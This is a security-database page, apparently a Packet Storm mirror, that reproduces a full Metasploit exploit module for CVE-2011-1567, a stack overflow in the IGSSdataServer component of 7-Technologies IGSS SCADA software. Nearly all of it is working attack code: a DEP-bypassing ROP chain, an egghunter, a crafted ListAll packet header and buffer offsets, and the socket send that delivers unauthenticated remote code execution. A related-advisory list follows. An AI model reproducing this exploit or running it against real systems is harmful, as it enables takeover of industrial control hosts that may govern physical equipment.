Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormLuigi AuriemmaPACKETSTORM:101465
HistoryMay 16, 2011 - 12:00 a.m.

7-Technologies IGSS <= v9.00.00 b11063 IGSSdataServer.exe Stack Overflow

2011-05-1600:00:00
Luigi Auriemma
packetstormsecurity.com
30

0.726 High

EPSS

Percentile

98.1%

JSON
`##  
# $Id: igss9_igssdataserver_listall.rb 12639 2011-05-16 19:30:17Z sinn3r $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GoodRanking  
  
include Msf::Exploit::Remote::Egghunter  
include Msf::Exploit::Remote::Tcp  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "7-Technologies IGSS <= v9.00.00 b11063 IGSSdataServer.exe Stack Overflow",  
'Description' => %q{  
This module exploits a vulnerability in the igssdataserver.exe component of 7-Technologies  
IGSS up to version 9.00.00 b11063. While processing a ListAll command, the application  
fails to do proper bounds checking before copying data into a small buffer on the stack.  
This causes a buffer overflow and allows to overwrite a structured exception handling record  
on the stack, allowing for unauthenticated remote code execution.  
},  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 12639 $',  
'Author' =>  
[  
'Luigi Auriemma', #Initial discovery, poc  
'Lincoln', #Metasploit  
'corelanc0d3r', #Rop exploit, combined XP SP3 & 2003 Server  
'sinn3r', #Serious Msf style policing  
],  
'References' =>  
[  
['CVE', '2011-1567'],  
['OSVDB', ''],  
['URL', 'http://aluigi.altervista.org/adv/igss_2-adv.txt'],  
],  
'Payload' =>  
{  
'BadChars' => "\x00",  
},  
'DefaultOptions' =>  
{  
'ExitFunction' => 'process',  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[  
'Windows XP SP3/2003 Server R2 SP2 (DEP Bypass)',  
{  
'Ret' => 0x1b77ca8c, #dao360.dll pivot 1388 bytes  
'Offset' => 500  
}  
],  
],  
'Privileged' => false,  
'DisclosureDate' => "March 24 2011",  
'DefaultTarget' => 0))  
  
register_options(  
[  
Opt::RPORT(12401)  
], self.class)  
end  
  
def junk  
return rand_text(4).unpack("L")[0].to_i  
end  
  
def exploit  
  
eggoptions =  
{  
:checksum => false,  
:eggtag => 'w00t',  
:depmethod => 'virtualprotect',  
:depreg => 'esi'  
}  
  
badchars = "\x00"  
hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)  
  
#dao360.dll - pvefindaddr rop 'n roll  
rop_chain = [  
0x1b7681c4, # rop nop  
0x1b7681c4, # rop nop  
0x1b7681c4, # rop nop  
0x1b7681c4, # rop nop  
0x1b7681c4, # rop nop  
0x1b7681c4, # rop nop  
0x1b7681c4, # rop nop  
0x1b7681c4, # rop nop  
0x1b7681c4, # rop nop  
0x1b7681c4, # rop nop  
0x1b72f174, # POP EAX # RETN 08  
0xA1A10101,  
0x1b7762a8, # ADD EAX,5E5F0000 # RETN 08   
junk,  
junk,  
0x1b73a55c, # XCHG EAX,EBX # RETN  
junk,  
junk,  
0x1b724004, # pop ebp  
0x1b72f15f, # &push esp # retn 8  
0x1b72f040, # POP ECX # RETN  
0x1B78F010, # writeable  
0x1b7681c2, # xor eax,eax # retn  
0x1b72495c, # add al,40 # mov [esi+4],eax # pop esi # retn 4  
0x41414141,   
0x1b76a883, # XCHG EAX,ESI # RETN 00   
junk,  
0x1b7785c1, # XOR EDX,EDX # CMP EAX,54 # SETE DL # MOV EAX,EDX # ADD ESP,8 # RETN 0C   
junk,  
junk,  
0x1b78535c, # ADD EDX,ESI # SUB EAX,EDX # MOV DWORD PTR DS:[ECX+F8],EAX # XOR EAX,EAX # POP ESI # RETN 10  
junk,  
junk,  
junk,  
junk,  
0x1b7280b4, # POP EDI # XOR EAX,EAX # POP ESI # RETN  
junk,  
junk,  
junk,  
junk,  
0x1b7681c4, # rop nop (edi)  
0x90909090, # esi -> eax -> nop  
0x1b72f174, # POP EAX # RETN 08  
0xA1F50214, # offset to &VirtualProtect  
0x1b7762a8, # ADD EAX,5E5F0000 # RETN 08  
junk,  
junk,  
0x1b73f3bd, # MOV EAX,DWORD PTR DS:[EAX] # RETN  
junk,  
junk,  
0x1b76a883, # XCHG EAX,ESI # RETN 00  
0x1b72f040, # pop ecx  
0x1B78F010, # writeable (ecx)  
0x1b764716, # PUSHAD # RETN  
].pack('V*')  
  
header = "\x00\x04\x01\x00\x34\x12\x0D\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00"  
header << rand_text(14)  
sploit = rop_chain  
sploit << "\x90" * 10  
sploit << hunter  
sploit << rand_text(target['Offset'] - (sploit.length))  
sploit << [target.ret].pack('V')   
sploit << egg  
sploit << rand_text(2000)  
  
connect  
print_status("Sending request...")  
sock.put(header + sploit)  
handler  
disconnect  
  
end  
  
end  
`

Related

saint 4
cve 1
cvelist 1
nvd 1
prion 1
openvas 2
checkpoint_advisories 1
saint
saint
7-Technologies Interactive Graphical SCADA System Remote Code Execution
2011-04-17 00:00:00
7-Technologies Interactive Graphical SCADA System Remote Code Execution
2011-04-17 00:00:00
7-Technologies Interactive Graphical SCADA System Remote Code Execution
2011-04-17 00:00:00
cve
cve
CVE-2011-1567
2011-04-05 15:19:36
cvelist
cvelist
CVE-2011-1567
2011-04-05 15:00:00
nvd
nvd
CVE-2011-1567
2011-04-05 15:19:36
prion
prion
Stack overflow
2011-04-05 15:19:00
openvas
openvas
7T Interactive Graphical SCADA System Multiple Security Vulnerabilities
2011-03-28 00:00:00
7T Interactive Graphical SCADA System Multiple Security Vulnerabilities
2011-03-28 00:00:00
checkpoint_advisories
checkpoint_advisories
7T Interactive Graphical SCADA System File Operations Buffer Overflows (CVE-2011-1567; CVE-2011-4050)
2011-05-15 00:00:00

0.726 High

EPSS

Percentile

98.1%

JSON
Related for PACKETSTORM:101465
saint4cve1cvelist1nvd1prion1openvas2checkpoint_advisories1